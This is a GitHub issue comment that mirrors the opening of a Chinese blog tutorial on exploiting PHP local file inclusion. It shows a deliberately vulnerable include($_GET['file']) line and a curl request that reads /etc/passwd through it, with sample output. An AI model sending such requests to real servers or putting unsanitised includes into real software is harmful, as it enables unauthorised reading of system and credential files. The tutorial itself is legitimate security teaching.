Anemone95 / anemone95.github.io

http://anemone.top/
2 stars 1 forks source link

文件包含漏洞利用 | Anemone's Blog #67

Open Anemone95 opened 5 years ago

Anemone95 commented 5 years ago

https://anemone.top/php-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%88%A9%E7%94%A8/

本地文件包含1<?php include($_GET['file']);?>文件读取本地文件包含可以作为文件读取使用:12345$ curl http://127.0.0.1/include.php?file=/etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin